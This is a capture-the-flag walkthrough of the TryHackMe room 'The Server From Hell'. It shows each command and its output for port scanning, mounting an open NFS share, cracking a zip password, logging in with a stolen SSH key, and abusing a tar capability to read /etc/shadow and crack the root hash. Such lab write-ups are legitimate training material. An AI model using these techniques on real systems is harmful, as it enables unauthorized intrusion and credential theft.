6 minute read


The Server From Hell is an medium rated room in TryHackMe by DeadPackets. With the hints from different nmap scans, we found a backup.zip file on a nfs share which was password protected and was cracked using john which had private key for a user hades. The backup also had the hint for the port where SSH was running and we login on the box as user hades. On the box linux capabilities on the /bin/tar binary was exploited to get a root shell on the box.

Task 1 - Hacking the server
Start at port 1337 and enumerate your way. Good luck.

Port 1337

1 We get a invalid response. Lets analyse the request in the burp.

On Burp


GET / HTTP/1.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,ne;q=0.8
Connection: close


Welcome traveller, to the beginning of your journey
To begin, find the trollface
Legend says he's hiding in the first 100 ports
Try printing the banners from the ports

Scanning top 100 ports

local@local:~/Documents/tryhackme/theserverfromhell$ nmap -p1-100 --script banner -oN top100
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-03 22:00 +0545                       
Nmap scan report for                                                       
Host is up (0.33s latency).                                                             
PORT    STATE SERVICE                                                                   
1/tcp   open  tcpmux                                                                    
| banner: 550 12345 00000000000000000000000000000000000000000000000000000               
2/tcp   open  compressnet                                                               
| banner: 550 12345 00000000000000000000000000000000000000000000000000000               
3/tcp   open  compressnet                                                               
| banner: 550 12345 00000000000000000000000000000000000000000000000000000               
4/tcp   open  unknown                                                                   
| banner: 550 12345 00000000000000000000000000000000000000000000000000000               
5/tcp   open  rje                                                                       
| banner: 550 12345 00000000000000000000000000000000000000000000000000000   
|_banner: \x8D000\x8D000\x100\x81\x89\x02\x81\x810w\x02\x03\x010\x010
95/tcp  open  supdup
| banner: <boinc_gui_rpc_reply>\x0A<major_version>0/major_version>\x0A<mi
96/tcp  open  dixie
| banner: HTTP/1.0 502 Bad Gateway\x0D\x0AProxy-Connection: close\x0D\x0A
|_Content-type: text/html; charset=us-ascii\x0D\x0A\x0D\x0A<html><head...
97/tcp  open  swift-rvf
|_banner: HTTP/1.0 204 j\x0D\x0AServer: ATEN HTTP Server(V46915)
98/tcp  open  linuxconf
|_banner: SIP/2.0 ------
99/tcp  open  metagram
| banner: E000\x83SFATAL0C0A0000Munsupported frontend protocol 3923.19778
|_: server supports 1.0 to 3.00Fpostmaster.c0L25040RProcessStartupPack...
100/tcp open  newacct
|_banner: 220 Personal FTP Server ready

Looks like there is firewall in place, which is showing all the ports as open. And another interesting things that I found here is the number 12345 which is repeating quite a lot on the banner. So thinking that as a hint, I connected to that port.

Port 12345

local@local:~/Documents/tryhackme/theserverfromhell$ nc 12345
NFS shares are cool, especially when they are misconfigured
It's on the standard port, no need for another scan

Enumerating nfs

Listing exports

local@local:~/Documents/tryhackme/theserverfromhell$ showmount -e
Export list for
/home/nfs *

Mounting the share

local@local:~/Documents/tryhackme/theserverfromhell$ mkdir mnt
local@local:~/Documents/tryhackme/theserverfromhell$ sudo mount -t nfs mnt/
local@local:~/Documents/tryhackme/theserverfromhell/mnt$ ls
local@local:~/Documents/tryhackme/theserverfromhell/mnt$ cp backup.zip ..

Extracting the zip’s content

local@local:~/Documents/tryhackme/theserverfromhell/mnt$ cd ..
local@local:~/Documents/tryhackme/theserverfromhell$ unzip backup.zip 
Archive:  backup.zip
   creating: home/hades/.ssh/
[backup.zip] home/hades/.ssh/id_rsa password:

But the zip is password protected. Lets try to crack the zip password using john.

John to crack zip’s password

local@local:~/Documents/tryhackme/theserverfromhell$ locate zip2john

I had already downloaded zip2john while playing koth on thm. zip2john is already present on most pentesting distros. If you do not have zip2john on you device, you can download it from github.

Creating hash using zip2john

local@local:~/Documents/tryhackme/theserverfromhell$ /home/local/Documents/tryhackme/koth/carnage/zip2john backup.zip 2>/dev/null | tee backup.hash 
backup.zip:$pkzip2$3*2*1*0*8*24*1c4c*b16d*7d8849d53ca2d690df91b5f8ff302e0eae9c13c7fbb169b6d935abdfef8c00e339f84c09*1*0*8*24*6f72*b16d*7168a30d9a64dc6df0956c675b62ff980dbd4f16fe022b1abb1c75e1943c97e47bbdc5f5*2*0*16*a*f51a7381*8e5*52*0*16*f51a*b16d*5050fa8c08f92051a2cad9941e8a8f4522a8c5dbfa32*$/pkzip2$::backup.zip:home/hades/.ssh/hint.txt, home/hades/.ssh/authorized_keys, home/hades/.ssh/id_rsa:backup.zip

Cracking the password

local@local:~/Documents/tryhackme/theserverfromhell$ john --wordlist=/usr/share/wordlists/rockyou.txt backup.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
No password hashes left to crack (see FAQ)
local@local:~/Documents/tryhackme/theserverfromhell$ john --show backup.hash 
backup.zip:zxcvbnm::backup.zip:home/hades/.ssh/hint.txt, home/hades/.ssh/authorized_keys, home/hades/.ssh/id_rsa:backup.zip

1 password hash cracked, 0 left

Password can be easily cracked with usual rockyou.txt wordlist.

Extracting the contents of backup.zip

local@local:~/Documents/tryhackme/theserverfromhell$ unzip backup.zip && rm backup.zip 
Archive:  backup.zip
[backup.zip] home/hades/.ssh/id_rsa password: 
  inflating: home/hades/.ssh/id_rsa  
 extracting: home/hades/.ssh/hint.txt  
  inflating: home/hades/.ssh/authorized_keys  
 extracting: home/hades/.ssh/flag.txt  
  inflating: home/hades/.ssh/id_rsa.pub 

We get some interesting files. The most interesting file is id_rsa which is the private key for user hades.

Content of flag.txt

local@local:~/Documents/tryhackme/theserverfromhell$ cd home/hades/.ssh/
local@local:~/Documents/tryhackme/theserverfromhell/home/hades/.ssh$ ls
authorized_keys  flag.txt  hint.txt  id_rsa  id_rsa.pub
local@local:~/Documents/tryhackme/theserverfromhell/home/hades/.ssh$ cat flag.txt 

Since we have the private key of user hades, lets try to login using the key.

local@local:~/Documents/tryhackme/theserverfromhell/home/hades/.ssh$ ssh -i id_rsa hades@
kex_exchange_identification: read: Connection reset by peer

But looks like the ssh service is not running on port 22.

Content of hint.txt

local@local:~/Documents/tryhackme/theserverfromhell/home/hades/.ssh$ cat hint.txt 

From the hint, looks like the ssh service is somewhere in between port 2500-4500.

Port Scan

local@local:~/Documents/tryhackme/theserverfromhell$ nmap -p2500-4500 --script=banner --min-rate 10000 -oN nmap/port2500-45000

I saved the output on the filename port2500-45000 so that I can manipulate the result easily.

Finding the port running SSH service

local@local:~/Documents/tryhackme/theserverfromhell$ cat nmap/port2500-45000 | grep -i openssh -B3
2632/tcp open  irdg-post
|_banner: \x01\x01
2633/tcp open  interintelli
|_banner: SSH-1017896-OpenSSH_Vwd .
| banner: 0077ERR \x0A  Your Git client has made an invalid request:\x0A 
|_ GET / HTTP/1.0\x0D\x0A\x0D\x0A\x0A  Visit http://support.github.com...
2675/tcp open  ttc-etap
|_banner: SSH-457-OpenSSHrv]+\x0D?
| banner: <?xml version="1.0" encoding="ISO-8859-1"?>\x0D\x0A<!DOCTYPE ht
|_ml PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"\x0D\x0A  "http://www.w3...
3333/tcp open  dec-notes
|_banner: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
| banner: +host=cashew version=70109 uptime=0:6917293 audio-bits=8audio-b
3353/tcp open  fatpipe
|_banner: SSH-17-OpenSSH_gSYIDLY miniBSD-144243\x0D?
| banner: HTTP/1.1 400 Bad Request\x0D\x0AContent-Length: 85\x0D\x0AConte
|_nt-Type: text/plain\x0D\x0A\x0D\x0AThe client sent a plain HTTP requ...
3699/tcp open  kpn-icw
|_banner: SSH-8877935-OpenSSH_cjAs-pwexp0r?

And from the banner, it looks like SSH is running on port 3333.

Shell as hades

local@local:~/Documents/tryhackme/theserverfromhell/nfs/home/hades/.ssh$ ssh -i id_rsa hades@ -p 3333

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Last login: Tue Nov  3 15:50:21 2020 from

 ██░ ██ ▓█████  ██▓     ██▓    
▓██░ ██▒▓█   ▀ ▓██▒    ▓██▒    
▒██▀▀██░▒███   ▒██░    ▒██░    
░▓█ ░██ ▒▓█  ▄ ▒██░    ▒██░    
 ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓  ░░ ▒░▓  ░
 ▒ ░▒░ ░ ░ ░  ░░ ░ ▒  ░░ ░ ▒  ░
 ░  ░░ ░   ░     ░ ░     ░ ░   
 ░  ░  ░   ░  ░    ░  ░    ░  ░
 Welcome to hell. We hope you enjoy your stay!

This time we log in. But we get a weird shell. Looks like it is running ruby.

Getting a bash shell

 irb(main):001:0> system('/bin/bash')

Reading User flag

hades@hell:~$ ls -la
total 28
drwxr-xr-x 3 root  root  4096 Sep 15 22:11 .
drwxr-xr-x 6 root  root  4096 Sep 15 22:11 ..
-rw-r--r-- 1 hades hades  220 Sep 15 22:11 .bash_logout
-rw-r--r-- 1 hades hades 3771 Sep 15 22:11 .bashrc
-rw-r--r-- 1 hades hades  807 Sep 15 22:11 .profile
drwx------ 2 hades hades 4096 Sep 15 22:11 .ssh
-rw-r--r-- 1 hades hades   30 Sep 15 22:11 user.txt
hades@hell:~$ cat user.txt 

I ran linpeas.sh to find out the potential privilege escalation vector and one entry of linux capability on /bin/tar caught my eye.

Linux Capabilities on /bin/tar

hades@hell:~$ getcap /bin/tar
/bin/tar = cap_dac_read_search+ep

This capability will help us to bypass file read permission checks and directory read and execute permission checks. It is well explained in this article.

Creating a tar of /root

hades@hell:/tmp$ /bin/tar -cvf root.tar /root/
/bin/tar: Removing leading `/' from member names

Extracting the root.tar archive

hades@hell:/tmp$ tar -xvf root.tar 

Reading root flag

hades@hell:/tmp$ cat root/root.txt 

Getting a root shell

hades@hell:/tmp$ /bin/tar -cvf root.tar /etc/shadow                                                                                                                             
/bin/tar: Removing leading `/' from member names                                        
hades@hell:/tmp$ tar -xvf root.tar                                                       

Root hash

hades@hell:/tmp$ cat etc/shadow | grep -i root

Cracking hash with hashcat

local@local:~/Documents/tryhackme/theserverfromhell$ hashcat -m 1800 hash /usr/share/wordlists/rockyou.txt 
hashcat (v5.1.0) starting...

The hash is successfully cracked and now we can login on the box as root.

hades@hell:/tmp$ su -
root@hell:~# id
uid=0(root) gid=0(root) groups=0(root)